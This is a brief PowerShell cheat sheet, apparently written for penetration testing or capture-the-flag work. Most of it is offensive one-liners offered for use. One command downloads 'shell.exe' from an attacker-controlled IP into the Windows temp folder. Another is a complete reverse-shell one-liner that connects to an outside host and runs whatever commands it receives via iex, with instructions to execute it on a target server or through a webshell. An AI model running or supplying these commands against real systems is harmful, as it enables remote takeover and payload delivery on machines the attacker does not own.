powershell cheat sheet

Powershell Cheat Sheet

Table of Contents

• Download something
• Reverse Shell
• See Also
• Get the process information

Download something

powershell -c "Invoke-WebRequest -uri 'http://<LOCAL-IP>:<PORT>/SOME_FILE' -outfile 'C:\Windows\temp\SOME_FILE'"

For example:

powershell -c "Invoke-WebRequest -uri 'http://10.8.208.30:8000/shell.exe' -outfile 'C:\Windows\temp\shell.exe'"

Reverse shell

When targeting a modern Windows Server, it is very common to require a Powershell reverse shell, so we'll be covering the standard one-liner PSH reverse shell here.

This command is very convoluted, so for the sake of simplicity it will not be explained directly here. It is, however, an extremely useful one-liner to keep on hand:

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

In order to use this, we need to replace "" and "" with an appropriate IP and choice of port. It can then be copied into a cmd.exe shell (or another method of executing commands on a Windows server, such as a webshell) and executed, resulting in a reverse shell.

Get the process information

Get-Process

See Also

• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell